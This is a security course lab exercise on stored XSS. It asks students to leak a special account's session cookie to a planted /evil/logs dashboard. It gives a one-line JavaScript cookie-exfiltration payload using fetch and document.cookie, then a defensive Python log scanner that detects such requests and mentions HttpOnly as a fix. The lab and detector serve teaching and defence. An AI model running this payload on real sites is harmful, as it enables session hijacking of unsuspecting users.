Leak cs161's session cookie (Stored XSS)
Difficulty: Medium
Because it is a special-purpose account, you won't find cs161's session token in the database. However, cs161 still sends a session_token cookie to the server with every request, so you might be able to leak cs161's token using a different attack.
Your CS161 alumni ally has inserted some evil malware that lets you log arbitrary values to an internal dashboard. When you send an HTTP GET request to the /evil/report endpoint and include a message parameter, the message is posted to the /evil/logs page. Try it by visiting the following URL in your browser!
https://box.cs161.org/evil/report?message=hello1234
Your task: Leak cs161's session cookie by pushing it onto the /evil/logs page.
Tips
- You may want to try this attack on yourself before executing it on another user.
- You may find this block of JavaScript code useful:
fetch('/evil/report?message='+document.cookie)
- You may assume the cs161 user will be browsing the main pages of the site in the background (e.g. home, list, upload, etc.).
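From the defender's side, here is an added detection check (example code, not part of the project): it scans web-server access logs in Apache combined format for /evil/report requests whose message parameter carries a session_token cookie, and reports the Referer, which points at the page where the stored payload was injected. The log lines and the token value are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache "combined" format); the token is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2024:12:00:00 +0000] "GET /evil/report?message=hello1234 HTTP/1.1" 200 2 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Apr/2024:12:00:05 +0000] "GET /evil/report?message=session_token=EXAMPLE_TOKEN_123 HTTP/1.1" 200 2 "https://box.cs161.org/list" "Mozilla/5.0"
10.0.0.7 - - [01/Apr/2024:12:00:06 +0000] "GET /upload HTTP/1.1" 200 512 "https://box.cs161.org/list" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def parse_cookie_string(value):
    """Split a document.cookie-style string ("a=1; b=2") into a dict."""
    cookies = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies

def find_cookie_exfil(log_text, endpoint="/evil/report", param="message", cookie_name="session_token"):
    """Return one record per request that smuggled the session cookie through the report endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m.group("target"))
        if url.path != endpoint:
            continue
        # parse_qs percent-decodes, so an encoded "session_token%3D..." is handled as well
        for value in parse_qs(url.query).get(param, []):
            cookies = parse_cookie_string(value)
            if cookie_name not in cookies:
                continue
            token = cookies[cookie_name]
            hits.append({
                "time": m.group("time"),
                "client": m.group("ip"),
                "referer": m.group("referer"),  # the page that hosted the stored payload
                "token_redacted": token[:4] + "*" * (len(token) - 4),  # do not re-log the secret
            })
    return hits

if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit)
```

Marking session_token as HttpOnly keeps it out of document.cookie, so the snippet above would report an empty message; the Referer column still shows which page carried the injected script.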